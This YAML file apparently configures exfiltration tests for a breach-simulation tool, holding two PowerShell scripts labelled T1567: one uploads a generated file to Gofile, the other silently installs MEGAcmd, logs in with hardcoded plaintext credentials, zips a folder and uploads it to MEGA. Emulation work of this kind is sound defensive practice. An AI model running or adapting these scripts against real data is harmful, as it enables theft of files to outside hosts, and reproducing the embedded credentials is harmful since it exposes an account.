# Exfiltration    - Total Commands : 1
# Last Modified   - May 8 2025 

commands:
  - technique: "T1567 - Exfiltration over web service- Gofile"
    command: |
        # Generate a sample file with random text
        $sampleText = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 500 | ForEach-Object {[char]$_})
        $Filename = "$env:TEMP\sample_file_$(Get-Random).txt"
        Set-Content -Path $Filename -Value $sampleText

        Write-Output "Sample file created at: $Filename"

        # Create a multipart form request
        $boundary = [System.Guid]::NewGuid().ToString()
        $LF = "`r`n"
        $fileBytes = [System.IO.File]::ReadAllBytes($Filename)
        $fileContent = [System.Text.Encoding]::GetEncoding("ISO-8859-1").GetString($fileBytes)

        $body = (
            "--$boundary",
            "Content-Disposition: form-data; name=`"file`"; filename=`"$([System.IO.Path]::GetFileName($Filename))`"",
            "Content-Type: application/octet-stream$LF",
            $fileContent,
            "--$boundary--$LF"
        ) -join $LF

        $headers = @{
            "Content-Type" = "multipart/form-data; boundary=$boundary"
        }

        # Upload the file using Invoke-RestMethod
        $response = Invoke-RestMethod -Uri "https://store10.gofile.io/contents/uploadfile" -Method Post -Headers $headers -Body $body

        # Check if the response contains the downloadPage URL
        $downloadPage = $response.data.downloadPage

        if ($downloadPage) {
            Write-Output "File uploaded successfully!"
            Write-Output "Download page: $downloadPage"
            Write-Output "DOWNLOAD_LINK: $downloadPage"
        } else {
            Write-Output "Failed to upload the file."
            Write-Output "Response: $($response | ConvertTo-Json -Depth 10)"
        }
    executor: "powershell"
    file_name: "Gofile_exfiltrate_attempt"
    
  - technique: "T1567 - Exfiltration over web service- Mega"
    command: |
      # Function to download and install MEGAcmd in the current directory
      function Install-MEGAcmd {
        $url64bit = "https://mega.nz/MEGAcmdSetup64.exe"
        $currentDirectory = $PSScriptRoot  # Use the current directory where the script is located
        $installerPath = [System.IO.Path]::Combine($currentDirectory, "MEGAcmdSetup.exe")
        
        Write-Host "Downloading MEGAcmd installer from $url64bit..." -ForegroundColor Cyan
        try {
            Invoke-WebRequest -Uri $url64bit -OutFile $installerPath
        }
        catch {
            Write-Error "Failed to download MEGAcmd installer. Error: $_"
            Exit
        }

        # Check if the installer file exists
        if (-not (Test-Path -Path $installerPath -PathType Leaf)) {
            Write-Error "MEGAcmd installer not found."
            Exit
        }

        Write-Host "Installing MEGAcmd..." -ForegroundColor Cyan
        try {
            Start-Process -FilePath $installerPath -ArgumentList "/S" -Wait -PassThru
        }
        catch {
            Write-Error "Failed to install MEGAcmd. Error: $_"
            Exit
        }

        # Clean up installer
        Remove-Item $installerPath -Force
      }

      # Function to ensure MEGAcmd is in PATH
      function Set-MEGAcmdPath {
        $paths = @(
          "C:\Program Files\MEGAcmd",
          "C:\Program Files (x86)\MEGAcmd",
          "$env:LOCALAPPDATA\MEGAcmd"
        )
        
        foreach ($path in $paths) {
            if (Test-Path $path) {
                $env:PATH += ";$path"
                Write-Host "MEGAcmd path added to PATH: $path" -ForegroundColor Green
                return $true
            }
        }

        Write-Error "MEGAcmd not found in the common directories."
        return $false
      }

      # Check if MEGAcmd is installed
      if (-not (Get-Command "mega-whoami" -ErrorAction SilentlyContinue)) {
        Write-Host "MEGAcmd is not installed. Installing now..." -ForegroundColor Yellow
        Install-MEGAcmd
      }

      # Set MEGAcmd path
      if (-not (Set-MEGAcmdPath)) {
        Write-Error "Failed to set MEGAcmd path."
        Exit
      }

      # Wait for a moment after installation
      Start-Sleep -Seconds 2

      # Predefined credentials
      $username = "sisabasactivity@outlook.com"
      $password = "Sisa@123"

      # Logout any existing session
      try {
        mega-logout
        Write-Host "Logged out from any existing session." -ForegroundColor Green
      }
      catch {
        Write-Warning "No existing session found to log out." -ForegroundColor Yellow
      }
      # Login with predefined credentials
      try {
        mega-login $username $password
        Write-Host "Logged in successfully as $username." -ForegroundColor Green
      }
      catch {
        Write-Error "Failed to login with credentials $username."
        Exit
      }
      # Verify login by checking who the current user is
      try {
        $UserEmailPre = mega-whoami
        Write-Host "Logged in as: $UserEmailPre" -ForegroundColor Green
      }
      catch {
        Write-Error "Failed to verify current user."
        Exit
      }
      # Detect and zip the folder
      $documentsPath = "C:\system34"
      if (-not (Test-Path -Path $documentsPath -PathType Container)) {
        Write-Warning "The directory $documentsPath does not exist. Creating it..." -ForegroundColor Yellow
        try {
          New-Item -Path $documentsPath -ItemType Directory -ErrorAction Stop
        }
        catch {
          Write-Error "Failed to create directory $documentsPath. Error: $_"
          Exit
        }
      }
      else {
        Write-Host "Using existing directory: $documentsPath" -ForegroundColor Green
      }
      # Get hostname of the machine
      $hostname = $env:COMPUTERNAME
      $zipFileName = "$hostname.zip"
      $zipFilePath = [System.IO.Path]::Combine($PSScriptRoot, $zipFileName)
      # Check if file already exists, add "_1" if it does
      $counter = 1
      while (Test-Path -Path $zipFilePath) {
        $zipFilePath = [System.IO.Path]::Combine($PSScriptRoot, "$hostname" + "_$counter.zip")
        $counter++
      }
      Write-Host "Zipping files from: $documentsPath" -ForegroundColor Yellow
      Write-Host "Saving zip file to: $zipFilePath" -ForegroundColor Yellow
      try {
        # Zip the folder
        Compress-Archive -Path $documentsPath\* -DestinationPath $zipFilePath
        Write-Host "Successfully zipped the folder: $zipFilePath" -ForegroundColor Green
      }
      catch {
        Write-Error "Failed to zip the folder. Error: $_"
        Exit
      }
      # Ensure MEGA's Exfiltration folder exists
      $uploadFolder = "Exfiltration_WIN"
      $remoteFolder = mega-mkdir $uploadFolder -ErrorAction SilentlyContinue
      # Upload the zip file to MEGA
      Write-Host "Uploading $zipFilePath to MEGA folder $uploadFolder" -ForegroundColor Yellow
      try {
        mega-put -q $zipFilePath $uploadFolder
        Write-Host "Successfully uploaded $zipFilePath to MEGA." -ForegroundColor Green
      }
      catch {
        Write-Error "Failed to upload $zipFilePath to MEGA. Error: $_"
      }
      # Display current transfers and their upload progress
      Do {
        $isMegaEmpty = mega-transfers --only-uploads
        Write-Host $isMegaEmpty
      } While (![string]::IsNullOrEmpty($isMegaEmpty))
      # Logout
      try {
        mega-logout
        Write-Host "Logged out from any existing session." -ForegroundColor Green
      }
      catch {
        Write-Warning "No existing session found to log out." -ForegroundColor Yellow
      }
    executor: "powershell"
    file_name: "Exfiltration_output"

paths:
  baseFolder: "C:\\system34"
  outputFolder: "C:\\system34\\Exfiltration_Output"
  SummaryFolder: "C:\\system34\\Summary"
